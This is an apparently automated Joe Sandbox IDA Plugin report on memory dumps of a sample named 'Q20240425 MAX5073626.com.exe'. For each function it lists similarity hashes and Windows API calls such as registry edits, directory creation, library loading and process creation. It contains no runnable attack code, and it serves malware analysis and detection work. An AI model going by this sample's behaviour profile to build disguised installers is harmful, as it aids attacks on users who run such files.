Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 3e5ecee338391c1f835af8bcbf51dfcb16336eafe0267e1191ddbe1c7e1cec0d
Instruction ID: 80678e2fb4a7a6979b06596d185cf774df534ff69d79561b472b2c0d498747b3
Opcode Fuzzy Hash: 3e5ecee338391c1f835af8bcbf51dfcb16336eafe0267e1191ddbe1c7e1cec0d
Instruction Fuzzy Hash: 4DD02B36101215E7C7002F216E0884FBB5DDF663607010436F501F2271D738C42285FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040699D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,: Completed,00000000,00000000,?,00405FCF), ref: 004069E4
RegCloseKey.KERNELBASE(?), ref: 004069EF

Strings

: Completed, xrefs: 004069A2

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 843227a38e9d42b110fc0d9566235887c0b847de959c2867f777273aa9976b3c
Instruction ID: a36d519718e890228eaa374ca5b8e64310d4445f69706a10c246fc5402a65521
Opcode Fuzzy Hash: 843227a38e9d42b110fc0d9566235887c0b847de959c2867f777273aa9976b3c
Instruction Fuzzy Hash: 18014C7661010AAEDF219FA8DD06ADB7BE8EF49344F114136B802F2160D234DA64DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405899 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004058A9

Part of subcall function 0040551D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040552F

OleUninitialize.OLE32(00000404,00000000), ref: 004058F5

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

Farserer248 Setup: Completed, xrefs: 00405899

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: Farserer248 Setup: Completed
API String ID: 1011633862-2307343146
Opcode ID: 40a16f44f5e8a13ad4ff7ab065eee26cc22f723808b8c65aba7eafe1e1020eaa
Instruction ID: 185011804211b685db9bb7642dcfb4f4a29fa32321b345d0848211e237b5a29b
Opcode Fuzzy Hash: 40a16f44f5e8a13ad4ff7ab065eee26cc22f723808b8c65aba7eafe1e1020eaa
Instruction Fuzzy Hash: EDF0B477700A00AAE6227B54ED01B5777B4EBD0319F41843EEE89B22E0DB754C528F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E53 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CFE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00405E5B
GetLastError.KERNEL32 ref: 00405E65

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E53

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1375471231-3081826266
Opcode ID: 00dec7d9cd160db4e52b789778cb879efdc981252dd7a61cd1af44f9212731dd
Instruction ID: 5859f427c5498e70eba6a6baa4b6a152232f49d489ffaa42f1d2507b6d6f6ac2
Opcode Fuzzy Hash: 00dec7d9cd160db4e52b789778cb879efdc981252dd7a61cd1af44f9212731dd
Instruction Fuzzy Hash: 5BC012327001309BC3601B75AE08547AE54DB116E13064539B988E1110D6304C1086E8

Uniqueness

Uniqueness Score: -1.00%

Function 00406ECE Relevance: 5.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 683f2bfd829e53f0f2c160aa0b6fcf399eacfd528cce75756187b225a6b249dc
Instruction ID: feb15d8ac423df11d484831e3fa9f1042f2dd77ca5ab5b89a121ecef13cf7db2
Opcode Fuzzy Hash: 683f2bfd829e53f0f2c160aa0b6fcf399eacfd528cce75756187b225a6b249dc
Instruction Fuzzy Hash: 1D913371A0C7808BE364CF29C480B6BBBE1ABC9344F10892EE5D9E7391D774A845CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0040225D Relevance: 4.6, APIs: 3, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040228C

Part of subcall function 00405D6F: lstrlenW.KERNEL32(Completed,?,00000000,?,?), ref: 00405DA1
Part of subcall function 00405D6F: lstrlenW.KERNEL32(?,Completed,?,00000000,?,?), ref: 00405DB3
Part of subcall function 00405D6F: lstrcatW.KERNEL32(Completed,?), ref: 00405DCE
Part of subcall function 00405D6F: SetWindowTextW.USER32(Completed,Completed), ref: 00405DE6
Part of subcall function 00405D6F: SendMessageW.USER32(?), ref: 00405E0D
Part of subcall function 00405D6F: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405E28
Part of subcall function 00405D6F: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E35

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004022A0
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: a7d3bafa5e6b0678f1117379dabcb590f233fbc7114db0d5526c93f2f76fa94d
Instruction ID: 8517b872d002c9ff263ef808374354244b171902ad5141c60be81ecd0f6b9bbc
Opcode Fuzzy Hash: a7d3bafa5e6b0678f1117379dabcb590f233fbc7114db0d5526c93f2f76fa94d
Instruction Fuzzy Hash: 97210632644301ABC711AF619E49A3F7694AF94721F20013FF941B12C1DBBC8802965F

Uniqueness

Uniqueness Score: -1.00%

Function 00402656 Relevance: 4.6, APIs: 3, Instructions: 77registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0040B0E8,00000023,?,00000011,00000002), ref: 004026C3
RegSetValueExW.KERNELBASE(?,?,?,?,0040B0E8,?,?,00000011,00000002), ref: 00402710
RegCloseKey.ADVAPI32(?,?,?,0040B0E8,?,?,00000011,00000002), ref: 0040271D

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 952bb6d7c8d57d15a8ef7defbc6e0c5b0878e4382beffd97acd7654b540214f0
Instruction ID: 577582608b70553307347a07f8070e1a5951a9265267386637c938975cf78b94
Opcode Fuzzy Hash: 952bb6d7c8d57d15a8ef7defbc6e0c5b0878e4382beffd97acd7654b540214f0
Instruction Fuzzy Hash: 66210032604300ABD7119FA0CD45B2FBBE8EB88760F10083EF181F31C0C7B99905879A

Uniqueness

Uniqueness Score: -1.00%

Function 00401D01 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401D81
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93

Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0

Strings

#32770, xrefs: 00401D21, 00401D27, 00401D41

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Global$AllocFreelstrcat
String ID: #32770
API String ID: 238967769-463685578
Opcode ID: 81542b20edc2233ee64623bb86dd9a2a0f5aecf4cca44fdc5785cc60253cde8c
Instruction ID: 7a97e807c60a67b8b63991fa3d2b0c5fe5153687e9ba530db717405b2fde2bf0
Opcode Fuzzy Hash: 81542b20edc2233ee64623bb86dd9a2a0f5aecf4cca44fdc5785cc60253cde8c
Instruction Fuzzy Hash: E011CD72A41310ABD720EF50D940A2B72A8AF04718B05443BFE46B72D1C778A8109B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004027FC
RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: e4a869243f2fb182c59e31d0911ab79aa47c196e1a6b4910a047185eaaf5f54b
Instruction ID: 9ed3e60ac52a06b2151d5ec02d436f9dddfc68f07ac9e87e8259fc0244004f81
Opcode Fuzzy Hash: e4a869243f2fb182c59e31d0911ab79aa47c196e1a6b4910a047185eaaf5f54b
Instruction Fuzzy Hash: 6B01B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A2180D7B86904866A

Uniqueness

Uniqueness Score: -1.00%

Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,0040B0E8,?,?,00000011,00000002), ref: 0040271D
RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: ed2639e677f6e5cde9149b88e97d54d192fe3c6a1fc7557abcda9ac58675f940
Instruction ID: 362dd49e9046cb744f8f8912aeb7b1ec941aa59feb9e40915e88316d6d73047e
Opcode Fuzzy Hash: ed2639e677f6e5cde9149b88e97d54d192fe3c6a1fc7557abcda9ac58675f940
Instruction Fuzzy Hash: 5611C235658302AFD7548FA4DA88A3BB3A4EF84319F10093FF542A21D1D7BC5A09CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 474f208232398db7832ae6cf9476e67801d30c6119a1d360729805140dd2eec7
Instruction ID: 24bc9e5fc202ee3a806e10c5c4c435a115486d70a18619fa80b37f59caf4cc8f
Opcode Fuzzy Hash: 474f208232398db7832ae6cf9476e67801d30c6119a1d360729805140dd2eec7
Instruction Fuzzy Hash: FE012472B142319BD7296F28AC08B2A2689A790711F15053EF501F72F2E7B89C02839C

Uniqueness

Uniqueness Score: -1.00%

Function 004025FF Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
RegCloseKey.ADVAPI32(00000000), ref: 00402627

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: f96e188a7ae5a14e42d54c9d4e205f70772fa1d97c018549f93087146f294a9c
Instruction ID: 1bcbad1c68f0b46bba20496b2b31256c8d917196160abd42dbdf13e8463e21ca
Opcode Fuzzy Hash: f96e188a7ae5a14e42d54c9d4e205f70772fa1d97c018549f93087146f294a9c
Instruction Fuzzy Hash: C4F02433645601A7E210ABA49D4AA7E765DAB903A2F11053FF642A61C4CE7E8C46862D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E73 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000000,?,?), ref: 00405EB5
GetLastError.KERNEL32 ref: 00405EBF

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: ef575f64b3f91d1faec8ab34c66b023bfb37b06c8571540b2f759fabd0b6ecc5
Instruction ID: 9ca6e340be766cb2c12845df8df972746f874c79875584cc98d0422f44504a32
Opcode Fuzzy Hash: ef575f64b3f91d1faec8ab34c66b023bfb37b06c8571540b2f759fabd0b6ecc5
Instruction Fuzzy Hash: B8F0A975D003099FDB409FE5D98469EBBB4FB08304F10813AD655F6240E77496448F99

Uniqueness

Uniqueness Score: -1.00%

Function 004066FC Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00424A20,?,?,?,Pata c",?), ref: 00406725
CloseHandle.KERNEL32(?,?,?,Pata c",?), ref: 00406732

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 273c1fa7d1aa044bd9c3ab863e2c50d84ab0076036b9951186af03cb5be5a70a
Instruction ID: 0a50308f4e5417437e0e41f78ffb2c0003d64207cbf72350d3c769349771434a
Opcode Fuzzy Hash: 273c1fa7d1aa044bd9c3ab863e2c50d84ab0076036b9951186af03cb5be5a70a
Instruction Fuzzy Hash: E5E04FB06001197FEB009B64ED06F7B776CEB10604F404435BE11E6150DB7498149E6C

Uniqueness

Uniqueness Score: -1.00%

Function 00406941 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,80000000,00000003,?,?,?,?,?), ref: 00406945
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 00406965

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

